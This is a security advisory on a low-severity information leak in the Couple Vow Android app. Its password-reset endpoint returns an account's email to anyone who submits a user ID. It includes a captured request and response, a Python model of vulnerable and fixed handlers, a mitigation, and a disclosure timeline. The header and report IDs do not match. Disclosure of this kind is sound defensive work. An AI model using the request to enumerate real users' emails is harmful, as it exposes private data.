SIK-2017-054


Title:

Information disclosure in CoupleVow App

Report ID

SIK-2017-045

Summary:

  • Vendor: 애펙스 주식회사
  • Product: Couple Vow (Package-Name: com.ms.coupleobserver)
  • Affected Version: 3.0.2
  • Severity: low
  • Short summary: When using the "forgot password" capability, the email address of the account is displayed to the user

Details:

When using the "forgot password" function, only the username needs to be entered, and the app then shows the email address of the user to which the password-reset link has been sent.
In this way, anyone who knows or guesses a user ID can obtain the email address belonging to that account.

REQUEST

POST /****/****/ HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; TP601A Build/LMY47V)
Host: push001.safe4kid.co.kr

{"method":"find_pass","my_id":"safran","iso_code":""}

RESPONSE

HTTP/1.1 200 OK
Date: Wed, 09 Aug 2017 15:30:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.4.38
Content-Length: 48
Connection: close
Content-Type: application/json

{"result":"success","email":"victims@mail.addr"}

Workaround

Suggested Mitigation

Do not return or display the email address in the password-reset response.
The user already knows her own email address, so the server does not need to reveal it.
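To make the difference between the reported behaviour and the suggested mitigation concrete, here is an added example (not the vendor's code, which runs on PHP; the handler is modelled in Python with a constructed user table). The hardened handler also returns the same body whether or not the user ID exists, which goes slightly beyond the advisory's wording but closes the same information-disclosure channel.

```python
import json

# Constructed sample data; in the real app this would be a database lookup.
USERS = {
    "safran": "victims@mail.addr",
    "alice": "alice@example.invalid",
}

SENT_MAIL = []  # constructed stand-in for the mail-sending subsystem


def send_reset_link(email):
    SENT_MAIL.append(email)


def make_request(user_id):
    """Build a request body in the format captured above."""
    return json.dumps({"method": "find_pass", "my_id": user_id, "iso_code": ""})


def find_pass_vulnerable(body):
    """Mirrors the behaviour described in the advisory: the response echoes
    the account's email address back to whoever supplied the user ID."""
    req = json.loads(body)
    email = USERS.get(req["my_id"])
    if email is None:
        return json.dumps({"result": "fail"})
    send_reset_link(email)
    return json.dumps({"result": "success", "email": email})


def find_pass_fixed(body):
    """Hardened variant (assumed design, not the vendor's fix): the reset
    link is still sent to the stored address, but the response never
    contains it and is identical for existing and unknown user IDs."""
    req = json.loads(body)
    email = USERS.get(req["my_id"])
    if email is not None:
        send_reset_link(email)
    return json.dumps({"result": "success"})


def leaks_email(handler, user_id):
    """Does the handler's response reveal the account's email address?"""
    return "email" in json.loads(handler(make_request(user_id)))


def distinguishes_accounts(handler, known_id, unknown_id):
    """Can a caller tell an existing account from a non-existing one?"""
    return handler(make_request(known_id)) != handler(make_request(unknown_id))
```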

Timeline

  • 2017-08-09 Vulnerability Discovered
  • 2017-08-09 Contacted developer
  • 2018-08-11 Published